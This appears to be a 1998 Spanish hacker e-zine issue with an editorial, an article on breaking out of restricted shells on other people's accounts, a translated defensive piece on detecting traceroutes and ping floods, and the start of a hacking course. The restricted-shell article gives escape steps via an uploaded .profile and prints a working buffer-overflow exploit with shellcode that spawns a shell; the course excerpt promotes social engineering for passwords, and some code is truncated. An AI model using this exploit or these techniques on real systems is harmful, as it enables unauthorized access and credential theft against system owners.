ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ» ³ ÚÄÄÄÄÄÄ¿ ³ ³ ³ÛÛÛÛÛÛ³ ³ ³ ÚÄÄÄÄÄÄ´ÛÛÚÄÄÄÙ ³ ³ ÚÄÄÄÄÄÄ´ÛÛÛÛÛÛ³ÛÛÀÄ¿ ³ ³ ³ÛÛÛÛÛÛÃÄ¿ÛÛÚÄ´ÛÛÛÛ³ ³ ³ ÀÄ¿ÛÛÚÄÁ¿³ÛÛ³J³ÛÛÚÄÙ ³ ³ ÚÄÄ¿³ÛÛ³ÛÛÀÙÛÛ³J³ÛÛ³ ³ ³ ³ÛÛÀÙÛÛ³ÛÛÛÛÛÛ³FÃÄÄÙ ³ ³ ³ÛÛÛÛÛÛÃÄÄÄÄÄÄÁÄÙ ³ ³ ÀÄÄÄÄÄÄÙ ³ ³ H A C K E R S T E A M ³ ³ J O U R N A L ³ ÌÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĹ ³ VOL. #1, N§5, 1998. ³ ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļ "LA PACIENCIA ES LA LLAVE DEL CONOCIMIENTO" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso de la informacion aqui expuesta y tampoco tiene que estar de acuerdo con lo que sus colaboradores opinen. Tampoco esperamos que la gente use la informacion aqui expuesta para hacer da¤o ya que tan solo es con fines didacticos. Recomendado el uso del editor del MS-DOS. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= #CURRENT MEMBERS : - CONDE VAMPIRO - CODER H/P/V EDITOR - MAC CRACK BISHOP - CODER C/P WEBMASTER #WEB OFICIAL : - http://www.angelfire.com/mi/JJFHackers - http://jjfhackers.home.ml.org #E-MAIL OFICIAL : - jjf_team@usa.net #LLAVE PGP OFICIAL : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAzVzXWwAAAEEALKaPtG7arRh4X0wUz16KP9/A6h4yhS5vcQ1QRx9TM7XV8w6 BcIJjz8AIeldDCO5Jix8R7Sb/FO/Uco0f5Rnpd98ObsHANr9wRDwGqUCWpOGVZ6+ ZhXEyfuDkzVl9MUxEVD1TyH08OGgdgRIKhCuPXY4C7W6Z+M0qVv0AX/CgliNAAUR tCNKSkYgSGFja2VycyBUZWFtIDxqamZfdGVhbUB1c2EubmV0PokAlQMFEDVzXW1b 9AF/woJYjQEBlVwEAKgIdS0VA7qRuXMM7R4DtDcoz7We+vmHr/Mu+SvgsDkWRbBP IHhI5OJxPRfShAvLtUXlGoCA0DuUDxoq4x9j/yDJQvhBwzPw53uwNWLs6+iI31jk NCyv9h37hSfRTsRLq8hiQ3jqNWQO/i+O+c5RVr5gkSHdZF0lCvWI5NoSFnk0 =Wu00 -----END PGP PUBLIC KEY BLOCK----- #DISTRIBUIDORES OFICIALES DEL E-ZINE : - http://wakanda.islatortuga.com - http://underhack.islatortuga.com - http://teleline.es/persona/dep_blue - http://members.xoom.com/baron_rojo/ - http://oioio.dyn.ml.org #MIEMBRO OFICIAL (web ring) DE : - Black Angels - Spanish Underground Web Ring #COLABORADORES CON ESTE NUMERO : - CubikIce - Nobody - Estado Porcino (WKT) #SALUDOS : - Metalslug (Wakanda) - Schoddy Guy (Underhack) - Cheroky - Silicon Dragon - Paseante (SET) - Dr Slump (oioio) <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> - INDICE. TITULO AUTOR ÄÄÄÄÄÄÄÄÄÄÄÄ\_______________________________/ÄÄÄÄÄÄÄÄÄÄÄÄ * EDITORIAL ................................ J.J.F. / HACKERS TEAM * HACK RSH (RESTRICTED SHELL) .............. NOBODY. * HERRAMIENTAS PARA USUARIOS DE LINUX (PARANOICOS?) ............................ CUBIKICE. * CURSO DE HACK V .......................... CONDE VAMPIRO. * COMO CRACKEAR NORTON CRASHGUARD DELUXE 3.0 ............................... ESTADO PORCINO. * UN POCO DE CULTURA: LIBROS ............... MAC CRACK * EL LECTOR OPINA .......................... VARIOS. * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ------------- ³ EDITORIAL ³ ------------- Como siempre volvemos a la carga con un nuevo numero de vuestro ezine favorito que siempre trae suculentos articulos. Pero por lo visto en los mail's de nuestros lectores, se puede apreciar que muchos nos deciis que nos pasamos con las materias aqui tratadas, otros que quereis informacion underground con el unico fin de colaros en computadoras ajenas, esto se¤ores mios!, es totalmente irracional. La filosofia de este ezine no se asemeja a esto ni por casualidad. Nosotros desde aqui lo unico que pretendemos es informar a la gente pero nunca con fines delictivos ni nada parecido, incluso estariamos encantados que los Administradores, expertos en seguridad, las autoridades, nos escriban articulos o sus opiniones, ya que este ezine esta pensado para todo el mundo. AVISAMOS, que la llave PGP que durante algunas semanas ha estado en la web disponible, ya NO es nuestra llave oficial, por eso os avisamos que nuestra llave oficial es esta que trae el ezine :) y tb la que esta ahora en el web. Por fin, como muchos lectores nos habian solicitado hemos puesto tanto en el web como en el ezine, nuestra llave publica, con el fin de aquellos que nos quieran decir algo mas confidencialmente lo puedan hacer sin ningun problema, como siempre mejoramos los servicios ;-) Ademas en este numero a los distribuidores oficiales se nos unen los de Oioio, ya conocidos en nuestro ezine :), pero este web solo esta disponible en ciertas ocasiones, que conste!! Con este numero termina nuestro primer volumen, el cual pensamos, que esta muy bien para la poca ayuda que recibimos por el momento, con permiso de un conocido politico que en un meeting dijo 'Menos aplausos y mas votos', yo digo 'Menos felicitaciones y mas articulos', esto solo intenta ser una reflexion entre los lectores, ya que este ezine lo hacemos todos no solo nosotros, siempre hay trabajo para todos. Deciros que ultimamente el USA.NET, el servidor donde nos enviais el correo no ha funcionado muy bien que digamos, por eso seguramente vuestros mail's no han llegado, por lo que simplemente nos vuelves a escribir y listos. Tambien deciros que procuramos que el web este siempre actualizado pero teneis que comprender que siempre se nos queda algun link antiquado, ya que el web es muy dinamico y hacemos lo que podemos, okis ? Bueno, chicos, ahora que ya estamos casi en verano, es hora de quitar el polvo a los ordenadores y hacer algo util en nuestras vidas, como por ejemplo investigar aquella cosa que te tiene tan intrigado y despues escribir un articulo sobre ello. Ahora ya no teneis excusa para trabajar un poco ;-) Que empieze lo bueno de una vez, pero no antes sin decirte que esperamos vuestros mail's con vuestras criticas, sugerencias, comentarios o cualquier cosa que nos quieras decir, y por supuesto vuestros actos de hack y tambien los programas que hayas creado para distribuirlos ;-), pues dicho todo lo que tenia que decir, escribe a: jjf_team@usa.net NOTA DEL WEBMASTER: Como ya habeis leido un poco mas arriba de esta editorial, los web los intento actualizar lo mas que puedo, ya se que hay de vez en cuando algunos links que no funcionan y que antes lo hacian, estoy en ello. Muchas veces esto pasa porque los servers a los que les he puesto el link se han caido, o estan de remodelacion. Una cosa que si quiero dejar clara, es que las web se actualizan periodicamente y los links se comprueban casi diariamente con el fin de que sigan funcionando perfec- tamente y a gusto de todos. Otra cosa, en vez de mandarme un mail diciendo que no funcionan los links (algunos) mejor, decirme cuales NO funcionan e intentare arreglarlos lo antes posible. Gracias. ;-) - J.J.F. / HACKERS TEAM - <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> 15-05-1998. ???????? ()()()()()()()()()()()()()()()()() () HACK RSH (RESTRICTED SHELL) () ()------------------------------() () by Nobody () ()()()()()()()()()()()()()()()()() Muchas veces cuando entramos en un shell ajeno, o sea en una cuenta de un servidor, nos encontramos con el famoso RSH 'restricted shell', que es un shell restringido, el cual es establecido por el administrador del sistema, para anular la ejecucion de comandos que pueden comprometer la seguridad del sistema, o incluso anulan el comando 'cd' para que no podemos salir de nuestro directorio de trabajo. Basicamente, lo que haremos aqui es explicar diferentes tecnicas, para poder saltarnos el rsh :), que conste que puede que estos metodos no funcionen, por lo que nos tendremos que espabilar y buscar nuevos metodos, solo teneis que poner a trabajar esa 'materia gris' que teneis por cabeza. Ahora lo mejor sera describir las restricciones que aplica el RSH, y como funciona. Estas restricciones son : - Los usuarios no pueden moverse de su directorio propio, ya que la orden 'cd' esta descapacitada. - Los usuarios no puden cambiar el valor de la variable PATH, de modo que solo pueden ejecutar ordenes en el PATH que les proporciona el administrador del sistema. - Los usuarios no pueden cambiar el valor de la variable SHELL. - Los usuarios no pueden ejecutar ordenes en directorios a los que aparezcan en su PATH, ya que no pueden utilizar un nombre de orden que contegan una barra diagonal '/'. - Los usuarios no pueden redirigir la salida usando '>' o '>>'. - Los usuarios no pueden utilizar ordenes exec. Como podemos ver el RSH, nos deja bastante limitados en el manejo del sistema. Estas restricciones se aplican cuando se ha ejecutado el .profile del usuario. El administrador debe preparar el fichero .profile, cambiando el propietario del fichero a root y ademas debe cambiar los permisos en el fichero para que nadie escriba en el mismo. El administrador define el PATH del usuario en el .profile de modo que el usuario solo pueda ejecutar comandos en su directorio especifico, generalmente se suele denominar /usr/rbin. En realidad el RSH suele ser el shell SH pero invocado mediante el parametro '-r'. La seguridad del RSH esta muy limitada ya que un hacker puede quebrarlo y obtener un shell sin rectricciones, pero se suele usar bastante ya que nos librara de muchos que juegan a hackers ;-) Bueno, ya basta de teoria y empezemos con el juego. Como sabemos en cada directorio de los usuarios hay unos determinados ficheros, que sirven para configuraciones y a que podemos acceder, etc. Por ejemplo para ver estos ficheros que son ocultos ejecutamos en el prompt : $ ls -al total 14 drwxr-xr-x 2 500 nobo 1024 May 7 20:18 . drwxr-xr-x 6 root root 1024 May 7 16:05 .. -rw-r--r-- 1 500 nobo 3768 Nov 7 1997 .Xdefaults -rw-r--r-T 1 root root 143 May 7 14:52 .bash_history -rw-r--r-- 1 500 nobo 24 Jul 14 1994 .bash_logout -rw-r--r-- 1 500 nobo 220 Aug 23 1995 .bash_profile -rw-r--r-- 1 500 nobo 124 Aug 23 1995 .bashrc -rw-rw-r-- 1 500 nobo 3336 Oct 24 1997 .screenrc $ Bueno, aqui tenemos un ejemplo de los ficheros ocultos que suelen tener los usuarios en sus directorios, los ficheros que nos interesan para este caso seran el .profile, aqui como .bash_profile y el .login que aqui no esta presente, que suele estar en algunos sistemas. Que podamos saltarnos el RSH se debe al descuido de los administradores, ya que esta considerado peligroso dejar el .profile en el directorio del usuario, debido a que muchas veces podemos sustituir el .profile por uno que creemos y subirlo usando el FTP a la cuenta. Lo que tenemos que hacer es crear un .profile en nuestra maquina, despues lo subimos por FTP a la cuenta que nos interesa y por ultimo via Telnet conectamos a la cuenta y ya estaremos usando el .profile que hayamos insertado :). Esto se debe a que aunque el .profile sea de propiedad root se encuentra en el directorio del usuario, por esta razon el usuario o en nuestro caso, nosotros, podemos escribir en el .profile. Para ver que shell tenemos, basta que mirremos el etc/passwd que es un fichero de lectura publica, aunque este en shadow podemos ver la ubicacion de los directorios de los usuarios y los shell's asignados, esto lo haremos de la siguiente manera: $ vi /etc/passwd Facil!! ;-) Pues ya a estas alturas ya debemos haver anulado el RSH, pero para aquellos que tengan un administrador mas avispado, que utilizen el siguiente programa, el cual desborda la memoria. ------------ Codigo Fuente --------------------------------------------------- /* SLACKWARE RSH Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 1997 Created: 8/15/97 Give thanks to Solar Designer for his su overflow, this is based on that peice of work. This is for educational purposes only, in no way am I responsible for what you do with this. This should be used by sys admins, or people who have permission of the admin to run it to see if this hole can exist on their system. If you use it for the wrong reasons then I say *tisk* on you. I will not be held responsible for your actions. This could be done with a generic overflow program, but just running this is easier. USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T MESSAGE ANYBODY ON IRC ABOUT THIS. */ #include #include #include char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 2048 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize - 4; i += 4) *(char **)&buffer[i] = get_sp() - 3072; memset(buffer, 0x90, 512); memcpy(&buffer[512], shellcode, strlen(shellcode)); buffer[bufsize - 1] = 0; setenv("NLSPATH", buffer, 1); system("clear"); printf("______________________________________________________________\n"); printf("| RSH Overflow -- (c) shit-head 1997\n"); printf("| Give props to Solar Designer for his su overflow, this is based on that.\n"); printf("|\n"); printf("| Peep's to: suid, knowy, thugzsta, you all be reet.\n"); printf("|\n"); printf("| *NOTE* I'm not responsible if you abuse this. Run only w/ premission\n"); printf("| Sending Overflow.... Done.\n"); printf("--------------------------------------------------------------\n"); execl("/usr/bin/rsh", "/usr/bin/rsh", NULL); } ------------ FIN ------------------------------------------------------------- Bueno, gente esto es todo por hoy y espero que os haya gustado el tema. Logicamente el RSH tiene mas truco pero no tiene gracia si os lo digo todo ;-) Y desde aqui saludar a toda la pe¤a de #seguridad_informatica!!!!! Grupos como - J.J.F. / HACKERS TEAM - , CYBERHACK, WAKANDA, UNDERHACK, @pOkalypSYS, Oioio y todos los demas !! Y por supuesto : Bisho, Folixia, Fragel, Ipgh0st, Metalslug, Dillet, Riddle, Hadden, Guybrush, Tdp, Virux, Cy, Angelipas, Schoddy Guy, Xus, Enif, Bit-Quake, L.A., Nadia, Amanda, Case_zero, DrSlump, Prova, Marsuff, Meroka, Eli, Minister, ElCoronel, Daek, Cosmic, Net Bull, Profesor Falken, Icehouse y todos los que me dejo :) NOBODY (c) 1998. <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> No creo que haya que decir que todo esto es por mero interes educativo! o si? :) /////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ [ Phrack Magazine Volume 7, Issue 5, Article 03 of 17] Herramientas para usuarios de Linux (paranoicos?) ------------------------------------------------- por whynot AKA baldor !!Se necesitan conocimientos basicos de TCP/IP para entender este articulo­­ Recientemente no solo el numero de ataques a servidores grandes o comerciales y maquinas con conexiones rapidas ha crecido, tambien muchos usuarios con conexion via telefonica han sido atacados o espiados. Un buen ejemplo es el programa winnuke.c que fue enviado a BugTraq y ha sido usado con exceso. Aqui, de lo que se trata no es de que sean lanzados hacia grandes servidores, sino de que pueden llegar a ser agobiantes si algun idiota intenta hackearte, para ralentizar tu conexion o tirar tu maquina. Muchas distribuciones de Linux han reaccionado ante tal desarrollo y han hecho que sus daemons de telnet/ftp/otros logueen cualquier acceso. Por la misma razon puedes poner furiosas medidas de seguridad en tu /etc/hosts..deny. Pero en mi opinion hay un par de cosas que se olvidan de las que yo quisiera hablar aqui. 1. Detectando traceroutes. Traceroute es un comando realmente poderoso que es normalmente usado para detectar donde y a que red esta conectado el ordenador que esta siendo trazado. Por una serie de razones simplemente *no* puedes evitar que otra persona te tracee, por eso lo mejor que puedes hacer es detectar *si* alguien te esta traceando o encontrar *quien* te esta traceando y confundirle un poco. 1.1 Como trabaja traceroute? Basicamente traceroute envia unos paquetes IP/UDP de prueba al host especificado. Para saber como es rutado el paquete (por que hosts esta pasando) traceroute usa el campo TTL (Time To Live) de la cabecera IP. El campo TTL especifica el limite superior de routers por los cuales pasa el paquete hasta que se pierde. Cada router decrementa el valor de este campo cuando llega el paquete en cuestion, hasta que llega a 0. Si esto ocurre el router envia el mensaje ICMP TIME_EXCEED al host que env¡a el paquete. Por eso la estrategia que traceroute usa para trazar la ruta de un paquete es enviar paquetes al host objetivo poniendole un valor que se incrementa (empezando con 1) en el campo TTL. Si un host envia el mensaje ICMP TIME_EXCEED traceroute muestra su direccion y el tiempo que ha pasado desde el envio del paquete de prueba IP/UDP hasta la recepci¢n del ICMP TIME_EXCEED. Tras eso prepara un nuevo paquete de prueba con un TTL una unidad mayor que el paquete anterior. Traceroute sigue haciendo esto hasta que recibe un paquete ICMP PORT_UNREACHABLE desde el ordenador objetivo, o hasta que llega al numero maximo de hops (saltos) que le hayamos indicado (por defecto 30). Para comprender todo esto deberiamos echarle un vistazo a la parte UDP del paquete que hemos hablado arriba. Para detectar que algo ha llegado al host objetivo y no enviar mas paquetes traceroute usa el protocolo UDP. La parte UDP del paquete de prueba esta dirigida a un puerto que nunca, o muy raramente se usa (en los Unix mas modernos es 33434 mas el TTL incluido en el paquete IP). Como (normalmente) nada esta escuchando en el puerto 33434 (o uno superior) el host objetivo envia una se¤al de ICMP PORT_UNREACHABLE que le indica a traceroute que ha encontrado al host objetivo y debe parar de enviar paquetes. Teniendo en cuenta que la mecanica de traceroute es un poco compleja aqui tenemos un ejemplo un poco simplificado. Digamos que tu eres el host 'source' y estas trazando tu ruta hacia el host 'target' source:/root # traceroute target traceroute to target (134.2.110.94), 30 hops max, 40 byte packets Ahora 'source' env¡a un paquete de prueba al host 'target' (puerto 33434) con un TTL de 1. El paquete pasa entonces por 'host_entremedio' y el router decrementa el TTL del paquete, descubre que el paquete ha "expirado" (TTL=0) y envia de vuelta un ICMP TIME_EXCEED a 'source'. Ahora traceroute usa la informacion incluida en este paquete para mostrar los datos del primer host por donde estan pasando los paquetes: 1 host_entremedio (142.45.23.1) 2.456 ms 'source' envia otro paquete de prueba, esta vez el TTL es 2 y el puerto es 33434+1 = 33435. Recibe otro paquete de vuelta ICMP TIME_EXCEED desde 'otro_host': 2 otro_host (142.45.10.1) 3.983 ms La tercera prueba tiene el TTL puesto a 3 y es dirigida al puerto 33436. Es ahora cuendo Traceroute recibe un ICMP PORT_UNREACHABLE desde 'target': 3 target (142.45.10.13) 4.032 ms Ahi esta ! Traceroute ha terminado su trabajo y se finaliza. source:/root # Hay que decir que, por defecto, traceroute envia tres paquetes conteniendo el mismo TTL (cada paquete a un numero de puerto incrementado) para determinar el tiempo de respuesta de un host con mas exactitud. En realidad, traceroute nos muestra algo como esto: traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets 1 localhost (127.0.0.1) 1.983 ms 1.304 ms 0.934 ms 1.2 El funcionamiento del detector de traceroute. Sabiendo como trabaja traceroute es muy facil detectarlo. Simplemente pon tus sockets a escuchar en el puerto 33434 y superiores y reacciona si recibes algun paquete. Puedes intentar adivinar con cuantos hops te estan traceando restando 33434 al puerto donde has recibido el paquete y dividiendo el resultado por 3. Escuchar en el puerto por el que traceroute envia el paquete de prueba tiene un bonito efecto: no enviar de vuelta un paquete ICMP TIME_EXCEED ni una se¤al de ICMP PORT_UNREACHABLE. Obtendr un timeout por respuesta y pondra un * en la lista de hosts porque con un timeout traceroute *no* reconocer que ha pasado por su objetivo y continuar enviando paquetes de prueba hasta que el numero maximo de hops sea alcanzado. Con el peque¤o programa detecttr corriendo (y escuchando en los puertos 33434 - 33434*30*3) un traceroute a nuestro host apareceria asi: schnecke:/root # traceroute localhost traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets 1 * * * 2 * * * . . . 30 * * * 1.3 Problemas detectando traceroutes. El unico problema con la deteccion de traceroutes es que alguien puede especificar un numero de puerto distinto del que hay por defecto o usar otra tecnica. Nunca he visto a nadie hacer esto, asi que si el idiota de turno (o un wannabe cualquiera) te esta trazando tus posibilidades de detectarlo son bastante altas. Si eres *realmente* paranoico con los traceroutes no deberias usar los puertos para detectar un traceo pero puedes editar el fichero que maneja los paquetes UDP. El fichero es: /usr/src/linux/net/ipv4/udp.c (NOTA: Este fichero es parte del kernel. Recompila el kernel para que los cambios tengan efecto) Inserta la linea: printk(KERN_INFO "UDP: packet sent to unreachable port by %s !\n", in_ntoa(daddr)); Tras la linea 833: ICMP_send(ski,ICMP_BEST_UNTEACH, ICMP_PORT_UNTEACH, 0, de); Esto hara que el sistema loguee *todas* las entradas a puertos que no esten escuchando algo con el protocolo UDP. Hay que decir que el bonito efecto descrito en el capitulo 1.2 no ocurriria (lo cual tambien podria ser una ventaja). BTW: Por favor, ten cuidado cuando edites el kernel - realmente lo necesitas :) 1.4 Un ejemplo de implementacion. detecttr.c -> Mira al final de este fichero 2.Detectando pings. Hubo un monton de discusion en los ultimos meses sobre ping porque ha sido usado con bastante frecuencia para transmitir gruesos paquetes a otros hosts que acabaron en crashes. A pesar de que este bug ha sido corregido en muchos hosts, el comando ping sigue siendo muy popular para ralentizar el modem de quienes estan en la Red, la conexion se les viene abajo debido a un GRAN lag. *No* puedes evitar que alguien te haga un ping (a no ser que tu ISP bloquee todos los paquetes ICMP_ECHO hacia tu ordenador) y tampoco que ping este aumentando el trafico en tu modem. Pero puedes detectar *quien* te ha hecho un ping, determinar el tama¤o del paquete ping y decidirte a no contestarle (esto *puede* reducir en 2 veces el ancho de banda de tu modem). 2.1 Como trabaja ping y como la gente ralentiza otras conexiones usando ping? Resumiendo, ping envia un paquete conteniendo un ICMP_ECHO y algunos datos mas al host objetivo el cual contestar con un paquete ICMP_ECHOREPLY que contiene, ademas, los datos enviados (solo se modifican unos pocos campos). Normalmente ping esperar un 1 segundo despues de enviar el siguiente ICMP_ECHO. En muchas implementaciones de ping se puede pasar por alto este segundo y hacer un 'floodping' que *no* esperar y enviar los paquetes tan rapido como sea posible. Si eliges un tama¤o grande de paquete y tu conexion es rapida (T1 o Ethernet) esto causar un monton de trafico en el modem de tu victima y acabara ralentiza ndolo hasta desconectarlo. 2.2 Como puedo detectar un ping y como puedo evitar que me flodeen? Como un ping no es mas que un ICMP_ECHO con algunos datos a¤adidos simplemente puedes interceptarlo, extraer la direccion del que te lo envia y el tama¤o del paquete y decidir si quieres responderle o no. Si el ping no es un flood-ping puedes reducir la cantidad de datos que transfieres desde tu modem simplemente no respondiendole. Pero si alguien te esta haciendo un floodping no te ayudar mucho el no responderle --> los paquetes ping probablemente estan causandote demasiado trafico y ralentizando tu conexion (mientras el host desde donde vienen los floodpings tenga una conexion lenta). Por lo menos siempre puedes darle una oportunidad... 2.3 Ejemplo de implementacion El manejo del ICMP_ECHO le corresponde al kernel. Edita el fichero /usr/src/linux/net/ipv4/icmp.c y busca la seccion 'Handle ICMP_ECHO'. Estas 16 lineas de codigo son todo lo que necesitas modificar para defenderte contra/detectar los ping-floods. Si sabes un poco de C podras ver que hay un define "CONFIG_IP_IGNORE_ECHO_REQUESTS" que puedes usar para que el el kernel ignore todos ICMP ECHO_REQUESTs entrantes. Pero queremos ser mas selectivos. Queremos hacer un log de todos los pings que envien a nuestra maquina.. Esto lo haremos insertando la linea: printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n",in_ntoa(saddr), icmp_param.data_len); tras el #endif. Es facil cambiar la seccion "Handle ICMP_ECHO" asi tu ordenador solo responder a los ICMP ECHO_REQUESTs que no sean muy voluminosos e ignorar los pings con paquetes de gran tama¤o. icmp.patch static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct device *dev, __u32 saddr, __u32 daddr, int len) { #ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS struct icmp_bxm icmp_param; if (len <= 1000) { /* solo contestamos a los ping que lleven menos de 1k de datos */ icmp_param.icmph=*icmph; icmp_param.icmph.type=ICMP_ECHOREPLY; icmp_param.data_ptr=(icmph+1); icmp_param.data_len=len; if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0) icmp_build_xmit(&icmp_param, daddr, saddr, skb->ip_hdr->tos); printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n", in_ntoa(saddr),icmp_param.data_len); } else printk(KERN_INFO "ICMP: possible FLOOD DETECTED by %s, packetsize = %d \n", in_ntoa(saddr),len ); #endif kfree_skb(skb, FREE_READ); } ------------ Codigo Fuente --------------------------------------------------- detecttr.c /* * detecttr.c - by whynot AKA baldor (whynot@cyberjunkie.com) * creado el: 08.05.97 * ultima modificacion: 11.07.97 * Plataformas: Linux, FreeBSD, podria funcionar con otros sistemas POSIX * tambien. * * Compilacion: * usa "gcc -o detecttr detecttr.c" para GNU C y * "cc -o detecttr detecttr.c" para otros compiladores... * * Uso: * Ejecuta este programa al arrancar la maquina permanecer en background * hasta que alguien te haga un traceroute. Solo hace un *miserable* uso de * tu RAM y cerca de un 0% de uso de tu CPU :) * */ #include #include #include #include #include #include #include #include #include #include #include /* comenta esta linea si no tienes syslog.h */ #include #define MAXBUFLEN 200 #define MYPORT 33435 #define NUMPORTS 30*3 int sockfd[NUMPORTS]; void shutitdown() { int w; char buf[50]; for (w=0; wh_name; } main(int argc, char *argv[]) { int hops; struct sockaddr_in my_addr; struct sockaddr_in remote_addr; int addr_len, numbytes; char buf[MAXBUFLEN]; int w; fd_set readfds; if( fork() !=0 ) return(0); /* Si no queremos usar el &... */ signal(SIGHUP, SIG_IGN); /* ignorar SIGHUP */ signal(SIGTERM, shutitdown); /* shutdown limpio */ for(w=0; w ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> - CURSO DE HACK - CHAPTER V Bueno, como ya se dijo en la Editorial este es el fin del primer volumen, por lo que creo que sera aconsejable en este numero, dar un repaso de las lecciones aprendidas. Ahora ya deberiamos tener una nocion basica de Hacking, pasando por la ingenieria social hasta un analisis de un server, pero para los que no les quedo claro, con lo expuesto aqui ya saldran de dudas y para aquellos que ya lo hayan aprendido pues un repaso no les vendra nada mal. Como vimos en el primer numero fue la ingenieria social, esto no creo que sea muy dificil de entender, basicamente consiste en hacernos pasar por otra persona con el fin de sacarle su login y password o algun tipo de informacion confidencial. Con el tiempo se ira cogiendo practica con esta 